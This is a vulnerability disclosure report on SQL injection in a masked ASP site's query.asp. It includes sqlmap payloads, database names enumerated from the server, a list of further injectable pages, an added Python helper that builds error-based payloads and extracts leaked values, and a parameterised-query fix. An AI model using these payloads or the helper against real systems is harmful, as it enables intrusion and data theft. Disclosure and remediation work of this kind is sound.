WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2016-01-20: Details sent to the vendor, awaiting the vendor's response
2016-01-22: Vendor confirmed; details visible to the vendor only
2016-02-01: Details opened to core white hats and experts in the relevant field
2016-02-11: Details opened to regular white hats
2016-02-21: Details opened to intern white hats
2016-03-06: Details opened to the public
As the title says.
#1 Burp capture

POST /cczn/query.asp HTTP/1.1
Content-Length: 290
Content-Type: application/x-www-form-urlencoded
Cookie: TklSys=ResourceList%5FCurrentPage=1&ResourceList%5FParent=20&ResourceList%5FWorkType=; ASPSESSIONIDCQDRBQRR=FECBMBMAIMILEKPLNEAKCGAK; isvoted=voteid2=2; Tsys%5FComment=Email=sample%40email%2Etst&Title=Mr%2E
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=123&optMuDiZhan=1&Submit=%c8%b7%b6%a8

The optChuFaZhan parameter is injectable. (The percent-escaped Button and Submit values are GBK-encoded, 返回 and 确定; a replay has to keep that charset.)
#2 Injection verification

[21:58:44] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
POST parameter 'optChuFaZhan' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 228 HTTP(s) requests:
---
Parameter: optChuFaZhan (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan=1&Submit=%c8%b7%b6%a8

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c8%b7%b6%a8
---
[21:58:50] [INFO] testing Microsoft SQL Server
[21:58:50] [INFO] confirming Microsoft SQL Server
[21:58:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[21:58:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 223 times

#3 Listing

[22:00:52] [INFO] parsing HTTP request from 'ty.txt'
[22:00:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:00:53] [INFO] testing connection to the target URL
[22:00:53] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: optChuFaZhan (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT&optMuDiZhan=1&Submit=%c8%b7%b6%a8

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as';WAITFOR DELAY '0:0:5'--&optMuDiZhan=1&Submit=%c8%b7%b6%a8

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing&optChuFaZhan=as' WAITFOR DELAY '0:0:5' AND 'rZay'='rZay&optMuDiZhan=1&Submit=%c8%b7%b6%a8
---
[22:00:53] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[22:00:53] [INFO] fetching database names
[22:00:53] [INFO] the SQL query used returns 25 entries
[22:00:53] [INFO] retrieved: bak2010
[22:00:53] [INFO] retrieved: bak2011
[22:00:53] [INFO] retrieved: bike
[22:00:54] [INFO] retrieved: cnh1001_db
[22:00:54] [INFO] retrieved: database2
[22:00:54] [INFO] retrieved: dicuz
[22:00:54] [INFO] retrieved: ERP
[22:00:54] [INFO] retrieved: gjmis_system
[22:00:54] [INFO] retrieved: gjmis2011
[22:00:55] [INFO] retrieved: gjmis2012
[22:00:55] [INFO] retrieved: gjmis2013
[22:00:55] [INFO] retrieved: gjmisth2007
[22:00:55] [INFO] retrieved: GJOA
[22:00:55] [INFO] retrieved: GJWY
[22:00:55] [INFO] retrieved: ick
[22:00:55] [INFO] retrieved: kefu
[22:00:56] [INFO] retrieved: master
[22:00:56] [INFO] retrieved: model
[22:00:56] [INFO] retrieved: msdb
[22:00:56] [INFO] retrieved: ReportServer
[22:00:56] [INFO] retrieved: ReportServerTempDB
[22:00:56] [INFO] retrieved: tempdb
[22:00:56] [INFO] retrieved: test
[22:00:56] [INFO] retrieved: webtest
[22:00:57] [INFO] retrieved: YCZ
available databases [25]:
[*] bak2010
[*] bak2011
[*] bike
[*] cnh1001_db
[*] database2
[*] dicuz
[*] ERP
[*] gjmis2011
[*] gjmis2012
[*] gjmis2013
[*] gjmis_system
[*] gjmisth2007
[*] GJOA
[*] GJWY
[*] ick
[*] kefu
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] webtest
[*] YCZ

#4 Several other pages have POST injection as well; I won't screenshot each one:
**.**.**.**/more.asp
**.**.**.**/more2.asp
**.**.**.**/more3.asp
**.**.**.**/more4.asp
**.**.**.**/more7.asp
**.**.**.**/more9.asp
**.**.**.**/more_fz.asp
**.**.**.**/more_ygfc.asp
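To make the capture in #1 and the sqlmap findings in #2 reproducible without the tool, here is an added Python example (it is not part of the original report and nothing in it comes from the site's code). It decodes the GBK-encoded form body, recovers the boundary markers sqlmap hid inside the CHAR() chains of the error-based payload, builds a payload of the same shape around any scalar subquery, and pulls the leaked value out of a SQL Server conversion error. The sample error page is constructed for the example; the database name inside it is one from the listing in #3 and is there only as sample data. Everything runs offline.

```python
import re
from urllib.parse import parse_qsl, quote

# Form body from the Burp capture in #1. The site serves GBK, so %b7%b5%bb%d8
# and %c8%b7%b6%a8 are GBK bytes, not UTF-8; replaying with the wrong charset
# would send different Button/Submit values than the browser did.
CAPTURED_BODY = (
    "Button=%b7%b5%bb%d8&ChuFaDiLeiXing=ZhanMing&MuDiDiLeiXing=ZhanMing"
    "&optChuFaZhan=123&optMuDiZhan=1&Submit=%c8%b7%b6%a8"
)

# Value of optChuFaZhan in the error-based payload sqlmap reported in #2.
ERROR_BASED_VALUE = (
    "as' AND 2086=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(120)+CHAR(113)"
    "+(SELECT (CASE WHEN (2086=2086) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'wNCT'='wNCT"
)

# Constructed stand-in for the ASP error page the payload provokes. The wording is
# SQL Server's standard conversion error; the name between the markers is sample data.
SAMPLE_ERROR_PAGE = (
    "Microsoft OLE DB Provider for SQL Server error '80040e07'<br>"
    "Conversion failed when converting the varchar value "
    "'qjxxqgjmis_systemqbpbq' to data type int."
)

CHAR_CALL = re.compile(r"CHAR\((\d+)\)")


def parse_gbk_form(body: str) -> dict:
    """Decode an x-www-form-urlencoded body whose percent-escapes are GBK bytes."""
    return dict(parse_qsl(body, keep_blank_values=True, encoding="gbk"))


def encode_gbk_form(fields: dict) -> str:
    """Re-encode the fields in GBK so a replayed request matches the browser's."""
    return "&".join(
        f"{quote(k, safe='', encoding='gbk')}={quote(v, safe='', encoding='gbk')}"
        for k, v in fields.items()
    )


def decode_char_chain(expr: str) -> str:
    """Turn CHAR(113)+CHAR(106)+... back into text (sqlmap avoids quote characters this way)."""
    return "".join(chr(int(n)) for n in CHAR_CALL.findall(expr))


def encode_char_chain(text: str) -> str:
    return "+".join(f"CHAR({ord(c)})" for c in text)


def split_markers(payload: str) -> tuple:
    """Recover the boundary markers from an error-based payload of sqlmap's shape.

    Everything before the inner SELECT is the opening marker; the chain after the
    CASE (which yields CHAR(49)='1' or CHAR(48)='0') is the closing marker.
    """
    head, _, rest = payload.partition("+(SELECT (CASE")
    _, _, tail = rest.partition("END))")
    return decode_char_chain(head), decode_char_chain(tail)


def error_based_payload(subquery: str, open_marker: str = "qjxxq",
                        close_marker: str = "qbpbq") -> str:
    """Build a payload of the same shape as sqlmap's around any scalar subquery.

    CONVERT(INT, '<open><value><close>') can never succeed, so SQL Server raises
    "Conversion failed when converting the ... value" and the value rides out in
    the error text. Error-based extraction only works because query.asp returns
    that database error to the client, which is also what the 223 HTTP 500s in #2 are.
    """
    chain = (f"{encode_char_chain(open_marker)}+({subquery})"
             f"+{encode_char_chain(close_marker)}")
    return f"x' AND 1=CONVERT(INT,(SELECT {chain})) AND 'a'='a"


def extract_leaked_value(response_text: str, open_marker: str = "qjxxq",
                         close_marker: str = "qbpbq"):
    """Pull the value between the markers out of an error page, or None if absent."""
    m = re.search(re.escape(open_marker) + r"(.*?)" + re.escape(close_marker),
                  response_text, re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    fields = parse_gbk_form(CAPTURED_BODY)
    print(fields["Button"], fields["Submit"])          # the two GBK-encoded buttons
    print(split_markers(ERROR_BASED_VALUE))            # ('qjxxq', 'qbpbq')
    fields["optChuFaZhan"] = error_based_payload("DB_NAME()")
    print(encode_gbk_form(fields))                     # body ready to replay
    print(extract_leaked_value(SAMPLE_ERROR_PAGE))     # gjmis_system
```

The markers are what make the channel reliable: the regex only needs to find `qjxxq...qbpbq` anywhere in the 500 page, whatever HTML surrounds the error. The stacked-queries finding (`';WAITFOR DELAY '0:0:5'--`) is the more serious of the three, since it shows the page executes whole batches, not just the altered WHERE clause.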
Patch it soon.
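The remark above asks for a patch. The added example below is not the site's code (query.asp's source is not on this page); it uses Python with sqlite3 standing in for SQL Server, and its table, rows and column name are constructed. It puts the string-building pattern that produces exactly the symptoms sqlmap reported, a lone quote breaking the statement (the HTTP 500s) and a quoted tautology rewriting the WHERE clause, next to the parameterised form that removes both. In the classic-ASP application itself the equivalent fix is an ADODB.Command whose values are attached with CreateParameter instead of being concatenated into the SQL text.

```python
import sqlite3

# Constructed stand-in for the table query.asp searches by station name.
STATIONS = [("Taiyuan",), ("Datong",), ("Yuncheng",)]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE station (id INTEGER PRIMARY KEY, zhanming TEXT)")
    con.executemany("INSERT INTO station (zhanming) VALUES (?)", STATIONS)
    return con


def lookup_vulnerable(con: sqlite3.Connection, opt_chu_fa_zhan: str) -> list:
    """The pattern the findings imply (hypothetical, since the ASP source is not shown):
    the form value is spliced into the SQL text, so a quote ends the literal and the
    rest of the value is parsed as SQL."""
    sql = ("SELECT id, zhanming FROM station WHERE zhanming='"
           + opt_chu_fa_zhan + "'")
    return con.execute(sql).fetchall()


def lookup_parameterised(con: sqlite3.Connection, opt_chu_fa_zhan: str) -> list:
    """The fix: the SQL text is constant and the value is bound as a parameter, so
    quotes, AND/OR and WAITFOR in the input are only characters to compare against."""
    sql = "SELECT id, zhanming FROM station WHERE zhanming=?"
    return con.execute(sql, (opt_chu_fa_zhan,)).fetchall()


def breaks_on_quote(con: sqlite3.Connection, lookup) -> bool:
    """Does a lone quote make the statement fail? With the vulnerable builder that
    database error is what the client sees as an HTTP 500."""
    try:
        lookup(con, "O'Hare")
        return False
    except sqlite3.Error:
        return True


def demo() -> dict:
    """Run the same inputs through both builders; the dict is what a reviewer checks."""
    con = make_db()
    # Boundary style from the sqlmap report, with OR so the effect shows up as rows.
    tautology = "as' OR 'wNCT'='wNCT"
    return {
        "normal_vuln": lookup_vulnerable(con, "Datong"),
        "normal_fixed": lookup_parameterised(con, "Datong"),
        "tautology_vuln": lookup_vulnerable(con, tautology),      # every row
        "tautology_fixed": lookup_parameterised(con, tautology),  # no such station
        "quote_breaks_vuln": breaks_on_quote(con, lookup_vulnerable),
        "quote_breaks_fixed": breaks_on_quote(con, lookup_parameterised),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:20} {result}")
```

Two further points follow from the report itself. The stacked-queries finding means the page runs whole batches, so the same fix has to be applied to every page in #4, not only query.asp. And a login that can list master, msdb and 23 other databases from a single form handler has far more privilege than that handler needs; a per-application login restricted to its own database limits what any remaining injection can reach.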
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2016-01-22 10:58
CNVD confirmed that it could not reproduce the described condition; the report has been handed to CNCERT, which passed it down to the Shanxi branch center, which will coordinate handling with the website's operating organization.
None yet.